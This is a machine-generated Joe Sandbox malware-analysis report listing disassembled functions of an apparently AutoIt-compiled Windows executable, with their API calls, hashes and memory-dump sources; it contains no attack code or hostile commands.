                                          • Opcode Fuzzy Hash: 07408049165096b67f0aff23a9c6c02fec643adfb5666c96abbd4d162f2c8903
                                          • Instruction Fuzzy Hash: 6321A3345082019FC700EF68C89196BB7E8EE55368F149A2DF4E9C72E1D731DE46DB42
                                          Function 0095DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0095F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0095DCD3,?,?,?,0095EAC6,00000000,000000EF,00000119,?,?), ref: 0095F0CB
                                            • Part of subcall function 0095F0BC: lstrcpyW.KERNEL32(00000000,?,?,0095DCD3,?,?,?,0095EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0095F0F1
                                            • Part of subcall function 0095F0BC: lstrcmpiW.KERNEL32(00000000,?,0095DCD3,?,?,?,0095EAC6,00000000,000000EF,00000119,?,?), ref: 0095F122
                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0095EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0095DCEC
                                          • lstrcpyW.KERNEL32(00000000,?,?,0095EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0095DD12
                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0095EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0095DD46
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: e4c5dad78d3659996cf9169c18d416a0baa03b1e3812f59b17780977a46de8ba
                                          • Instruction ID: d392e4732a7fb335fd1d80ac9b3cbdb8daea4c1e090c2d6efb76a9be528ba8d3
                                          • Opcode Fuzzy Hash: e4c5dad78d3659996cf9169c18d416a0baa03b1e3812f59b17780977a46de8ba
                                          • Instruction Fuzzy Hash: 5A11BE3A201305EFCB25EF75D845A7A77B8FF85360B40902AE806CB2A0EB719854D7A1
                                          Function 009350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00935101
                                            • Part of subcall function 0092571C: __FF_MSGBANNER.LIBCMT ref: 00925733
                                            • Part of subcall function 0092571C: __NMSG_WRITE.LIBCMT ref: 0092573A
                                            • Part of subcall function 0092571C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000000,?,?,?,00920DD3,?), ref: 0092575F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: 24830c0257c83480e727f97dceae6d04777de711355329130b6fb4ea9b8c484f
                                          • Instruction ID: 16c5b616bc9f262b94b858f65e303f81fd5c0fb63e2e561fbee2368812294528
                                          • Opcode Fuzzy Hash: 24830c0257c83480e727f97dceae6d04777de711355329130b6fb4ea9b8c484f
                                          • Instruction Fuzzy Hash: 2E11C6B290DA25AFCF313FB4BC45B5E379C9F583A1F12492AF90496254DE34C9409B90
                                          Function 00976369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00967896,?,?,00000000), ref: 00905A2C
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00967896,?,?,00000000,?,?), ref: 00905A50
                                          • gethostbyname.WSOCK32(?,?,?), ref: 00976399
                                          • WSAGetLastError.WSOCK32(00000000), ref: 009763A4
                                          • _memmove.LIBCMT ref: 009763D1
                                          • inet_ntoa.WSOCK32(?), ref: 009763DC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: 66be3b788155631fc490ff5d2f90caeee6f967b133b4b614e5fcc6fd88c249cc
                                          • Instruction ID: 458ceb819a1f4e7929e5632c14699f37f5b3e895d87765923457b4bdfe7ddc19
                                          • Opcode Fuzzy Hash: 66be3b788155631fc490ff5d2f90caeee6f967b133b4b614e5fcc6fd88c249cc
                                          • Instruction Fuzzy Hash: 77113072600109AFCF04FBA4DD56EEEB7B9AF84310B548065F506A72A2DB31AE14DB61
                                          Function 00958B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00958B61
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00958B73
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00958B89
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00958BA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 47e9946d5c795c8a9f303cfa8601b3141b8038784091156841f9431d1bbf4f50
                                          • Instruction ID: f942296d95eab385d7dbdc601a78f81aa7ff8c7cc4a43d08f0dc07e1c287fdc2
                                          • Opcode Fuzzy Hash: 47e9946d5c795c8a9f303cfa8601b3141b8038784091156841f9431d1bbf4f50
                                          • Instruction Fuzzy Hash: 0C112E79901218FFDB11DF95CC85FAEBB78FB48710F2041A5E900B7250DA716E15DB94
                                          Function 00901290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • DefDlgProcW.USER32(?,00000020,?), ref: 009012D8
                                          • GetClientRect.USER32(?,?), ref: 0093B5FB
                                          • GetCursorPos.USER32(?), ref: 0093B605
                                          • ScreenToClient.USER32(?,?), ref: 0093B610
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Client$CursorLongProcRectScreenWindow
                                          • String ID:
                                          • API String ID: 4127811313-0
                                          • Opcode ID: 600a827e197ec14d93c34b554be029ebdfcca3f3c250dd45971ab60563189083
                                          • Instruction ID: 2ad6fa45784c1969fba501c62ac0b7d649806a8fc090f75e0c7701d37df3e093
                                          • Opcode Fuzzy Hash: 600a827e197ec14d93c34b554be029ebdfcca3f3c250dd45971ab60563189083
                                          • Instruction Fuzzy Hash: 64113635A10119EFCB10EFA8D899AFE77B8EB45300F400856FA11E7280D730BA919BA5
                                          Function 00961142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0095FCED,?,00960D40,?,00008000), ref: 0096115F
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0095FCED,?,00960D40,?,00008000), ref: 00961184
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0095FCED,?,00960D40,?,00008000), ref: 0096118E
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,0095FCED,?,00960D40,?,00008000), ref: 009611C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: 23b6e24fd558a65cc562feb650a00c9d18376451792bd5099bfe4a6a8ac47ee7
                                          • Instruction ID: 61094f8d55d155a0b435e258107e8953cb2ec551e5617d36e3aa6944420d52e8
                                          • Opcode Fuzzy Hash: 23b6e24fd558a65cc562feb650a00c9d18376451792bd5099bfe4a6a8ac47ee7
                                          • Instruction Fuzzy Hash: 85118E31C0852DDBCF00DFA5D888AEEBB78FF0A711F064456EA41F2240CB349550DB91
                                          Function 0095D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0095D84D
                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0095D864
                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0095D879
                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0095D897
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Type$Register$FileLoadModuleNameUser
                                          • String ID:
                                          • API String ID: 1352324309-0
                                          • Opcode ID: 159a3733207b22a0e4e87b5273ca700524828cbf5bebee869b295ac2cb15fa7c
                                          • Instruction ID: d5c346b7237a290d2e501891c1dabf6ba49b8a4e719454b3d55128289d36f566
                                          • Opcode Fuzzy Hash: 159a3733207b22a0e4e87b5273ca700524828cbf5bebee869b295ac2cb15fa7c
                                          • Instruction Fuzzy Hash: 15115E75606304DBE330CF52EC0CF92BBBCEB00B01F108969AA16D6160D7B4E549ABA1
                                          Function 00936FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: 0af3a3763e3ef55ea615e531df0b4f1cfdaf9fc27dad33250e61e0dd8e97f550
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 49014BB244814ABBCF2A5EC4CC42CEE7F66BB18354F588415FA5858031D236C9B1AF91
                                          Function 0098B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 0098B2E4
                                          • ScreenToClient.USER32(?,?), ref: 0098B2FC
                                          • ScreenToClient.USER32(?,?), ref: 0098B320
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0098B33B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: e7d83d1aeab846462830409e6ec73e70f2723c4676ee175db85b50db6c9b5fc8
                                          • Instruction ID: ae2064caf69b29ed55c75bf7c549a4bd7744f96c47e19ed1f06a64d13e27d581
                                          • Opcode Fuzzy Hash: e7d83d1aeab846462830409e6ec73e70f2723c4676ee175db85b50db6c9b5fc8
                                          • Instruction Fuzzy Hash: 7A116475D0420DAFDB01DF99C4449EEBBB9FB18310F104166E915E2320D731AA519F50
                                          Function 0098B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0098B644
                                          • _memset.LIBCMT ref: 0098B653
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009C6F20,009C6F64), ref: 0098B682
                                          • CloseHandle.KERNEL32 ref: 0098B694
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3277943733-0
                                          • Opcode ID: d88e7abc86db37b2b4fe569e6457848c7ca119dd2859033f257e8a6dd1e388b0
                                          • Instruction ID: bad24db874190d3b9650fc4a1556524d6fc6df7fa90685293a44ecef5fb5ada5
                                          • Opcode Fuzzy Hash: d88e7abc86db37b2b4fe569e6457848c7ca119dd2859033f257e8a6dd1e388b0
                                          • Instruction Fuzzy Hash: C3F082B29543107BE3102761BC06FBB3E9CEB08395F404029FA08E9192D7718C0097B9
                                          Function 00966BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 00966BE6
                                            • Part of subcall function 009676C4: _memset.LIBCMT ref: 009676F9
                                          • _memmove.LIBCMT ref: 00966C09
                                          • _memset.LIBCMT ref: 00966C16
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00966C26
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          • Opcode ID: d7b9d6884564f817a72d03031fa63292d0dd43ac1d8e96a2685604e3a574f678
                                          • Instruction ID: 7e26c15adc46d14cf49d89950597b46f4836fc8763ece6b1f5f17ae9c2981004
                                          • Opcode Fuzzy Hash: d7b9d6884564f817a72d03031fa63292d0dd43ac1d8e96a2685604e3a574f678
                                          • Instruction Fuzzy Hash: C1F05E3A204110BBCF016F95EC85B8ABB29EF85320F088061FE085E26BD735E811DBB4
                                          Function 00902218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 00902231
                                          • SetTextColor.GDI32(?,000000FF), ref: 0090223B
                                          • SetBkMode.GDI32(?,00000001), ref: 00902250
                                          • GetStockObject.GDI32(00000005), ref: 00902258
                                          • GetWindowDC.USER32(?,00000000), ref: 0093BE83
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0093BE90
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0093BEA9
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0093BEC2
                                          • GetPixel.GDI32(00000000,?,?), ref: 0093BEE2
                                          • ReleaseDC.USER32(?,00000000), ref: 0093BEED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: 967632ffdbf2f263345b93ce0eb01c13f08d781400a4a01cc8c399c2f1b8779c
                                          • Instruction ID: 3ad05bf4714286904537fb7895efc8f9d0131dfceb701e2f51201fb566f27fb3
                                          • Opcode Fuzzy Hash: 967632ffdbf2f263345b93ce0eb01c13f08d781400a4a01cc8c399c2f1b8779c
                                          • Instruction Fuzzy Hash: 6DE03932118244EADF215FA8EC4D7E83B14EB05336F109366FA69480E187714990EF12
                                          Function 00958712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 0095871B
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,009582E6), ref: 00958722
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009582E6), ref: 0095872F
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,009582E6), ref: 00958736
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: d22783ef21a4dd2206e67e53e672686b1593a17a9bb5119483403d90b4df9836
                                          • Instruction ID: 46dcfbcf2340b0219088d190517eafa42f3ee972748a8bb5d8920f44a3b0117c
                                          • Opcode Fuzzy Hash: d22783ef21a4dd2206e67e53e672686b1593a17a9bb5119483403d90b4df9836
                                          • Instruction Fuzzy Hash: C8E0CD366293119FD7205FB15D0CB5B3BACEF547D2F24483CF645E9050DA348449E750
                                          Function 0095B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0095B4BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ContainedObject
                                          • String ID: AutoIt3GUI$Container
                                          • API String ID: 3565006973-3941886329
                                          • Opcode ID: c3e45bfff352b253258b1ac3cfa451537a1ce12b32df1fc70202f2c4afa2189a
                                          • Instruction ID: cd494fe7030afb21ac83a6c2e5c7393ac4739b26dbca505d67324dcc1fc7ba10
                                          • Opcode Fuzzy Hash: c3e45bfff352b253258b1ac3cfa451537a1ce12b32df1fc70202f2c4afa2189a
                                          • Instruction Fuzzy Hash: DC913970600601AFDB24DF65C884B6ABBE9FF49711F20856DFD4ACB2A1EB70E845CB50
                                          Function 0096AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0091FC86: _wcscpy.LIBCMT ref: 0091FCA9
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • __wcsnicmp.LIBCMT ref: 0096B02D
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0096B0F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          • Opcode ID: db54e9d22f1d07b7024fc582509168ed8bfb345277669c11078c7648c9a87e51
                                          • Instruction ID: 51da95a595e326fcafaa382796ab8dc6702a0310a82508b32cafa8aa917d0137
                                          • Opcode Fuzzy Hash: db54e9d22f1d07b7024fc582509168ed8bfb345277669c11078c7648c9a87e51
                                          • Instruction Fuzzy Hash: 35619275A04219AFCB14DF94C891EAEB7B8EF49310F118069F916EB391E734AE84CB50
                                          Function 00912957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00912968
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00912981
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
